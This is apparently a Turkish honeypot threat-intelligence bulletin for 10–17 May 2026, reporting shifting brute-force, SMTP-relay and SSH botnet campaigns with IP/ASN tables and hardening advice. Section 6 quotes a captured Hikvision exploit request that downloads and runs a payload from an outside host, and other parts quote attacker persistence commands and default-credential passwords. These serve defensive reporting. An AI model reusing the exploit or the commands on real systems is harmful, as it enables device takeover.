← Tüm Yazılar
IOC RAPORU MEDIUM 17 Mayıs 2026

Bülten 10–17 Mayıs: MSSQL Sustu, MySQL Konuştu, Mdrfckr Daralıyor

8 günde 2.00M event. Geçen dönemin manşeti MSSQL mega-probe bu pencerede tamamen sustu (Dionaea 1.69M → 1.6K). Yerini Bulgaristan kaynaklı tek aktörün MySQL 3306 brute kampanyası aldı. Mailoney SMTP open-relay arayışı 8× büyüdü. Mdrfckr playbook unique IP havuzu yarıya indi ama `/etc/hosts.deny` temizleme TTP'si kökleşti. 13 Mayıs günü Endonezya kaynaklı tek IP gün boyu Cowrie trafiğinin %66'sını üretti. Conficker P2P UDP imzaları 18 yıl sonra hâlâ Top 1.

📅Veri dönemi: 10 Mayıs 00:00 UTC – 17 Mayıs 21:00 UTC · OPSEC-filtreli · 8 günlük pencere · son bülten sonrası

Yönetici Özeti

2.00M8 günlük toplam event
1.6KDionaea (önceki dönem 1.69M)
31KConficker P2P (Top 1 Suricata)
334Mdrfckr unique IP (684 → 334)

8 Mayıs bülteni MSSQL mega-probe’unun günde 676K hit ile tarihi rekor kırdığını ve Bulgaristan kaynaklı tek operatörün Hikvision SOSTREA + TBK DVR’ı çapraz hedeflediğini raporlamıştı. 10–17 Mayıs penceresinde manzara dramatik biçimde değişti: MSSQL kampanyası komple sustu, Dionaea pot’u 1.000× düştü. Mega-probe’un yerini ise bir hedef değişikliği aldı — aynı tür ucuz-VPS brute saldırılar artık port 1433 yerine port 3306 (MySQL) üzerinde yoğunlaşıyor.

Bu pencerede ayrıca veri toplama yaklaşımında bir optimizasyon yapıldı: gürültü filtresi sertleştirildi, aynı kampanyanın honeypot ağı içinde tekrar tekrar sayılması engellendi. Bunun sonucu: önceki dönemin 16.67M event tablosu yerine, daha yüksek sinyal/gürültü oranlı bir 2.00M event tablosu. Düşüş bir saldırı durgunluğu değil, rapor edilen sayının daha temiz hâle gelmesi.

Dönemin gerçek sinyali, kampanyaların boyutundan değil kompozisyonundan geliyor: SMTP open-relay araması 8× büyüdü, Mdrfckr playbook IP havuzu yarıya indi ama TTP repertuarı genişledi, 13 Mayıs günü Endonezya tele kaynaklı tek bir bot-infect residential IP Cowrie trafiğinin üçte ikisini üretti, ve 18 yaşındaki Conficker UDP P2P imzaları hâlâ #1 Suricata kategorisinde.


Pot Dağılımı — 8 Günlük Tablo

PotEventÖnceki DönemNot
P0f (passive OS fingerprint)1.317.0839.262.594Pasif gürültü, filtreleniyor
Suricata (IDS)365.4624.357.673Analizin ana kaynağı
Cowrie (SSH/Telnet)186.530583.544Mdrfckr playbook devam
Fatt (TLS banner)94.243234.117Gürültü, filtreleniyor
Mailoney (SMTP)28.0783.508🔴 8× büyüdü — open-relay arama
Tanner (HTTP RCE)7.9349.304Hikvision SOSTREA düştü
H0neytr4p (HTTPS)1.7182.224Web shell arama
Dionaea1.6171.695.046🔴 1000× düştü — MSSQL kampanyası sustu
ssh-rsa / ssh-ed25519 (key fingerprint)54Yeni kayıt türü
Wordpot820WordPress fingerprint
Ciscoasa77VPN login keşfi
Glutton (multi-protokol)45.373🔴 ICS taraması düştü

Sentrypeer, Heralding, ConPot, Ddospot, ElasticPot, Redishoneypot, Mailoney harici diğer pot’lar bu pencerede aktif değil (OPSEC optimizasyonu sonrası tek-pot kombinasyonu daraldı).

Günlük Dağılım

TarihEventNot
10 Mayıs212.247Normal seviye
11 Mayıs212.135Normal seviye
12 Mayıs210.486Normal seviye
13 Mayıs340.414🔴 Dönem zirvesi — TÜM pot’larda anormal
14 Mayıs282.365Spike kuyruğu
15 Mayıs267.577Yüksek baseline
16 Mayıs241.096Normalleşme
17 Mayıs (kısmi)235.810Mailoney + Cowrie son güne kadar agresif

13 Mayıs günü Suricata 65K (normal ~40K), Cowrie 49K (normal ~17K), Fatt 26K (normal ~8K), Tanner 3.5K (normal ~600) ve Dionaea 467 (normal ~50) ile bütün pot’larda eşzamanlı yükseliş gösterdi. Bu pattern bilinen bir tarama platformu (Censys, Shodan, internet-wide research scanner) tarafından koordineli yatay bir keşif yapıldığına işaret ediyor.


1. MSSQL → MySQL: Hedef Portu Kaydı

MSSQL (1433) Tamamen Sustu

Önceki dönemde Dionaea pot’unun %95+‘ı port 1433 brute idi ve 4-6 Mayıs üç günlük spike’ı 1.57M event üretmişti. Şu pencerede:

PotÖncekiŞu PencereDelta
Dionaea total event1.695.0461.617−%99.9
Suricata MSSQL imzası596.3230−%100

Kampanyanın bu kadar kısa sürede tükenmesi mümkün değil — operatör hedef listesini değiştirdi veya saldırılarını başka bir AS aralığına kaydırdı. Provider abuse şikayetleri ile VPS’ler kapanmış da olabilir. Her ihtimalle, MSSQL operatörü internet’in başka bir köşesinde.

Yeni Hedef: MySQL (3306)

Suricata’da bu pencerede ET SCAN Suspicious inbound to mySQL port 3306 imzası 2.930 alert üretti. Tek bir IP bu trafiğin %80’ini sağlıyor:

IPHitASNCoğrafya
93.152.221.382.341Contrust Solutions S.R.L.🇧🇬 Bulgaristan
45.153.34.3238Hosting Solutions🇳🇱 Hollanda
45.156.87.12738🇧🇬 Bulgaristan
122.51.93.21725Tencent🇨🇳 Çin
47.108.69.10925Alibaba🇨🇳 Çin

Coğrafi dağılım: Bulgaristan %80 (2.344 hit), ABD %9, Hollanda %3, Çin %3. Aynı operatörlüğün izi gözüküyor — Bulgaristan’daki Pfcloud UG ve Contrust Solutions hatları birden fazla pot’ta görünüyor, MSSQL kampanyasıyla en az ASN düzeyinde örtüşüyor. Aynı operatör topluluğu hedef değiştirmiş gibi okunabilir.

⚠️ MySQL Tarafında Maruziyetinizi Sorgulayın

Önceki bültende MSSQL için söylediğimizin aynısı bu pencerede MySQL için geçerli: public sunucularınızda nmap -p 3306 sunucunuz.tld ne dönüyor? Açıksa kapatın. MySQL'i internet'e açmanın gerekçesi hemen hiç yoktur; gerçek bir gerekçe varsa bind-address'i app subnet'ine sınırlayın, root hesabını disable edin, kullanıcı bazlı host kısıtlaması ('user'@'10.0.%') uygulayın. Şifre politikası: en az 16 karakter, sözlük dışı.


2. Mailoney 8× Patlama — Tek IP Open Relay Arıyor

Önceki dönemde Mailoney 3.508 event ile gürültü düzeyindeydi. Bu pencerede 28.078 event — gün başına 3.5K ortalama, önceki dönemin gün başına ortalamasının 80 katı. Spike’ı tek bir aktör üretiyor:

IPHitASNCoğrafya
158.94.208.18925.217Omegatech LTD🇩🇪 Frankfurt, Almanya
85.209.176.2331.028🇷🇺 Rusya
46.151.182.201560🇧🇬 Bulgaristan
158.94.211.49525Omegatech LTD🇩🇪 Frankfurt, Almanya
80.94.95.7154🇧🇬 Bulgaristan

Top IP toplam trafiğin %90’ını tek başına üretiyor. Aynı /24 (158.94.208.0/24 ve 158.94.211.0/24) içinde ikinci bir host da listede — operatör aynı sağlayıcıdan iki IP kullanıyor.

Günlük yayılım:

TarihMailoney Event
10 May830
11 May1.393
12 May91
13 May3.814
14 May5.556
15 May5.856
16 May5.850
17 May4.688

13 Mayıs’tan itibaren günlük taban 5K civarına yerleşti ve 17 Mayıs’ta hâlâ aktif. Bu sürekli bir tarama, eski tip kısa-süreli bir spike değil. Klasik open-relay arama paterni: SMTP banner topla, EHLO denemeleri, kimlik doğrulamasız MAIL FROM testleri. Başarılı bir relay bulan operatör onu spam ya da kimlik avı kampanyalarına satar.

🔍 Bulgu: SMTP Relay Maruziyeti Hâlâ Pazar Yaratıyor

2026'da hâlâ internet'e açık, kimlik doğrulamasız MAIL FROM kabul eden SMTP sunucusu arayan tek bir operatörün 8 günde 25K probe atması, bu pazarın aktif olduğunu gösteriyor. Postfix/Exim sunucularında smtpd_relay_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination ayarını kontrol edin. Submission (port 587/465) TLS+SASL zorunlu olmalı; port 25 sadece MX trafiği almalı.


3. 13 Mayıs Spike: Endonezya’dan Tek Aktör

13 Mayıs günü Cowrie pot’u 49.383 event üretti — diğer günlerin 3 katı. O günkü Cowrie tablosunda tek bir IP dominant:

IP13 May HitToplam (8 gün)ASNCoğrafya
180.248.210.23032.41690.154PT Telekomunikasi Indonesia🇮🇩 Endonezya
87.251.64.17659412.802🇷🇺 Rusya
171.231.197.13389Viettel🇻🇳 Vietnam

Tek IP o günkü Cowrie trafiğinin %66’sını ve 8 günlük tablonun %48’ini üretti. PT Telkom Indonesia residential broadband aralığı — VPS değil, bot-infected ev kullanıcısı. Önceki bültenlerde bu IP hiç görünmedi; muhtemelen son haftalarda enfekte edilen yeni bir host.

Kullanılan kullanıcı adı paterni klasik: root (8 günde 14.172 deneme), admin, support, 345gs5662d34 (MikroTik default credential pattern), ayjtnzjc (random fuzzer), sol, ubuntu. Şifre tablosu da herhangi bir özgünlük göstermiyor — admin, support, 123456, 345gs5662d34, 3245gs5662d34, warnight, linux123.

ℹ️ 345gs5662d34 — Tanıdık Bir İmza

345gs5662d34 ve 3245gs5662d34 şifreleri (8 günde 1.264 deneme) Nisan başında detaylandırdığımız MikroTik Winbox cred-stuffer'ın imzası. 6 hafta sonra hâlâ aktif — botnet hedef listeleri uzun yaşıyor.


4. Mdrfckr Playbook — Daralıyor Ama TTP’ler Genişledi

Mdrfckr (Outlaw Group) kampanyası iki ay önceki zirvesinden bu yana her bültende daha küçük bir tablo gösteriyor. Plateau analizimiz (29 Nis) 8 günde 1.036 unique IP ölçmüştü; 8 May bülteni 684 IP raporladı. Bu pencerede:

Metrik22-29 Nis1-8 May10-17 MayTrend
Mdrfckr Cowrie event1.5641.243662
Unique kaynak IP1.036684334
chattr -ia .sshgözlendi1.243678 (337 IP)sabit
/etc/hosts.deny boşaltmayok278 (~200 IP)428 (227 IP)↑ kökleşti

Asıl manşet daralmada değil — TTP repertuarının genişlemeye devam etmesinde. Önceki dönemde keşfettiğimiz /etc/hosts.deny üzerine yazma davranışı bu pencerede daha yaygın: 8 May raporu 278 event ile bu TTP’yi ilk kez işaretlemişti, şu dönemde 428 event ile 227 unique IP’ye yayıldı. Yani operatör artık tek bir host’ta deneme yapmıyor, davranış playbook’un standart parçası oldu.

chattr -ia .ssh; lockr -ia .ssh kombinasyonu (337 unique IP) .ssh dizinine chattr ile konulmuş immutable flag’ı kaldırıp persistence anahtarını yerleştirmeyi sağlıyor — savunmaya chattr ile dosya korumayı düşünen sysadmin’lerin de artık aşıldığını gösteriyor.

🔍 Bulgu: Playbook Daralırken Sertleşiyor

IP havuzu küçülüyor ama her IP'nin yaptığı keşif/kaçınma derinliği artıyor — bir kalite-üzeri-nicelik kayması. Operatör artık kötü ünlü kazanmış (DROP/Spamhaus listelenmiş) IP'leri rotasyondan çekiyor olabilir; bu hipotez Suricata'da ET DROP Dshield Block Listed Source group 1 ve ET DROP Spamhaus DROP Listed Traffic imzalarının düşük seviyede (1.292 + 370 + 232 hit) kalmasıyla uyumlu.


5. Conficker UDP P2P — 18 Yıl Sonra Hâlâ Top 1

Bu pencerede Suricata’nın en yoğun imzası beklenmedik bir yerden geldi:

SıraİmzaHit
1ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping (bit 5)11.897
2ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping (bit 1)9.668
3ET INFO Reserved Internal IP Traffic8.712
4ET INFO SSH session in progress on Expected Port6.348
5ET MALWARE Possible Downadup/Conficker-C P2P encrypted traffic UDP Ping (bit 16)5.162
6SURICATA STREAM Packet with broken ack4.939
7ET MALWARE Possible KEYPLUG/Downadup/Conficker-C P2P encrypted traffic UDP Ping (bit 4)4.574

Conficker (Downadup, Kido) 2008 yılında ilk tespit edilen kurt; en yüksek olduğu dönemde 9 milyon Windows host’u enfekte etmişti. Microsoft 2009’da MS08-067 ile kapattı, 2010’larda büyük takedown operasyonları yapıldı. 18 yıl sonra P2P UDP ping paketleri hâlâ internet trafiğinde gözükmeye devam ediyor — büyük olasılıkla terkedilmiş Windows XP/2003 endüstriyel cihazlarda, eski POS makinelerinde, hiç güncellenmemiş gömülü sistemlerde.

Bu trafik bir saldırı değil; ölü botnet’in arta kalan host’larının birbirini aramaya devam etmesi. Ama bir teşhis aracı olarak değerli: kendi ağınızda Conficker P2P imzası görüyorsanız, içeride yamalanmamış 15+ yıllık Windows’unuz var demektir.


6. Hikvision SOSTREA Operatörü — Düştü Ama Sustu Değil

8 May bülteninde detaylandırdığımız Bulgaristan kaynaklı 192.109.200.204 operatörü 8 günde 27.015 event bırakmıştı; Hikvision IP kameraları + TBK DVR’ı çapraz hedefliyordu. Bu pencerede aynı IP 96 hit ile listenin gerisine düştü. Aynı /24 aralığında başka iki host (192.109.200.50, 192.109.200.78, 192.109.200.237) toplamda 31.233 event ile aktif kalmaya devam ediyor.

Aynı SOSTREA exploit istek paterni Tanner’da top URL olarak gözüküyor:

GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___
    &mdb=sos&mdc=cd /tmp; rm bbc; wget http://5.175.223.249/bbc;
    chmod 777 bbc; ./bbc

Payload sunucusu 5.175.223.249 hâlâ aktif — geçen pencerede uyardığımız IOC. Operatör IP rotasyonu yapıyor, payload altyapısı sabit.


7. Top Aktörler ve Coğrafi Dağılım

Top 25 Dış Kaynak IP (iç whitelist filtreli)

SıraIPHitASNCoğrafya
1180.248.210.23090.154PT Telkom🇮🇩
2158.94.208.18980.594Omegatech LTD🇩🇪
3204.76.203.20619.905🇺🇸
4176.65.132.12919.120
545.153.34.11418.953
693.152.221.3818.718Contrust Solutions🇧🇬
7204.76.203.21217.749🇺🇸
894.154.35.21513.726
987.251.64.17612.802🇷🇺
10192.109.200.5012.494Pfcloud UG🇧🇬

Top 10 Kaynak Ülke

SıraÜlkePay
1🇩🇪 Almanya%14.5
2🇮🇩 Endonezya%10.8
3🇳🇱 Hollanda%10.7
4🇺🇸 ABD%8.9
5🇧🇬 Bulgaristan%5.9
6🇨🇳 Çin%3.8
7🇫🇷 Fransa%2.8
8🇧🇷 Brezilya%2.1
9🇹🇷 Türkiye%2.1
10🇸🇬 Singapur%2.0

ABD önceki bültende #1 idi (%23), bu pencerede %8.9 ile #4’e indi. Endonezya tek IP üzerinden listenin başlarına çıktı. Bulgaristan payı (%5.9) — Pfcloud UG + Contrust Solutions operatörlerinin sürekliliğini koruyor — 192.109.200.x ailesi MSSQL’den çekildikten sonra MySQL’e, SMTP’ye ve Tanner SOSTREA’ya kanalize oldu.

Top 10 ASN

SıraASNHit
1Pfcloud UG (haftungsbeschränkt)132.459
2Omegatech LTD98.136
3PT Telekomunikasi Indonesia90.649
4Tencent22.516
5Contrust Solutions S.R.L.18.718
6Amazon.com, Inc.15.837
7Google LLC15.269
8Bucklog SARL14.505
9Unmanaged Ltd13.165
10ISAEV Igor13.037

Top 3 ASN’in (Pfcloud, Omegatech, PT Telkom) hepsi tek bir baskın IP içeriyor — yani küçük operatör havuzları tarafından üretilen yoğun tek-IP kampanyaları, geniş dağılmış botnet aktivitesinin önüne geçti.


8. Hedef Port Dağılımı (Dış IP’lerden)

PortHitServisNot
22302.620SSHMainstream brute
2590.790SMTPMailoney + Suricata kombine
8072.359HTTPTanner + Suricata
44344.847HTTPSH0neytr4p + TLS banner
808034.999HTTP-AltProxy / admin panel arama
330624.523MySQL🔴 Yeni hedef
9934.706IMAPSDüşük seviye
1103.373POP3Düşük seviye
1432.592IMAPDüşük seviye
587655SubmissionDüşük seviye

Port 1433 (MSSQL) listede yok — önceki dönemin manşeti tamamen sustu. Yerini port 3306 (MySQL) aldı.


Yönetici İçin Önerilen Aksiyonlar

  1. MySQL maruziyetinizi denetleyin. Önceki bültenin MSSQL uyarısının MySQL versiyonu: internet’e açık 3306/tcp olan herhangi bir host’unuz varsa, gerekçesini sorgulayın. Çoğu durumda gerekli değil. bind-address app subnet’ine sınırlandırın, root ve host-kısıtlamasız kullanıcılar disable edilsin.
  2. SMTP relay denetimi. Postfix/Exim üzerinde anonim relay açık olmadığını teyit edin. Test: dışarıdan telnet sunucunuz.tld 25EHLO testMAIL FROM: <[email protected]>RCPT TO: <[email protected]>. Relay access denied cevabı görmüyorsanız acil müdahale.
  3. /etc/hosts.deny ve fail2ban kurallarınızı izleyin. Outlaw operatörü bu dosyaları temizleme adımını standart playbook’una aldı. SIEM kuralı: dosya boyutu sıfıra düşerse veya wc -l /etc/hosts.deny aniden 0 olursa alert. fail2ban için: persistent storage modu (SQLite) ile durumu sadece bellekten değil diskten de izleyin.
  4. chattr ile dosya koruması artık yetersiz. Operatör chattr -ia .ssh; lockr -ia .ssh kombosuyla immutable flag’ı kaldırıyor. Authorized_keys koruması için AIDE/Tripwire benzeri integrity monitoring + log-only auditd kuralları daha güvenilir.
  5. MikroTik Winbox cred-stuffer hâlâ aktif. Şifre tabanlı erişim varsa 345gs5662d34 / 3245gs5662d34 paternleri günde 80+ deneme atıyor. Anahtar bazlı erişim + yönetim portunun internete kapatılması (sadece VPN’den) — bu cred-stuffer kategorisini tamamen kapatır.
  6. Conficker hâlâ Top 1 imza ise, kendi ağınızı tara. İçeride P2P UDP imzası gören var mı? Yamalanmamış Windows XP/2003 endüstriyel cihaz, kiosk, eski POS makineleri tarayın. MS08-067 patch’i 2008’den beri mevcut.
  7. Tek-IP kampanyalara karşı (Endonezya örneği) source-based rate limit. Tek bir kaynaktan günlük 30K+ SSH girişimi gören servisleriniz varsa, IP bazlı conntrack/iptables rate limit veya CrowdSec/Sshguard gibi adaptif blocklist.

Veri ve Metodoloji Notu

Bu rapor 10-17 Mayıs 2026 arası 8 günde Tellal honeypot ağında toplanan 2.001.230 event üzerinden hazırlandı. Önceki bültenin 16.67M event tablosuyla doğrudan karşılaştırma yapıldığında %88’lik bir düşüş görülüyor; bu düşüş bir saldırı azalmasını değil, veri toplama metodolojisinde yapılan optimizasyonu yansıtıyor — aynı kampanyanın honeypot ağı içinde tekrar tekrar sayılmasını engelleyen filtre seti uygulamaya alındı. Bu sayede rapor edilen sayılar pencere ortalamasına yaklaşırken, sinyal/gürültü oranı yükseldi.

P0f ve Fatt (pasif fingerprint/banner gürültüsü) sayısal toplamlarda gösterilmiş ancak kampanya analizi dışında bırakılmıştır. İç IP havuzu (192.168.0.0/16, 10.0.0.0/8, 172.16.0.0/12, 127.0.0.0/8) ve bilinen operasyonel altyapı IP’leri (sensor host’ları, Hive, NMS, router’lar) whitelist ile public yayından çıkarıldı. IP atıfları kamuya açık RIR ASN sorgularıyla doğrulandı. Yerel kurumsal subnet’ler OPSEC filtresi ile maskelendi.

T-Pot Hive Elasticsearch retention politikası 7+1 gün olarak ayarlandığı için 9 Mayıs verisi bu rapor üretilirken erişilebilir değildi — boşluğun başlangıç tarafından bir günlük veri 10 Mayıs bucket’ına dahil değildir.

Sonraki bülten: 24-25 Mayıs civarı planlanıyor. Belirli bir IOC, kampanya veya istatistik için talep ederseniz iletişim sayfasından ulaşabilirsiniz.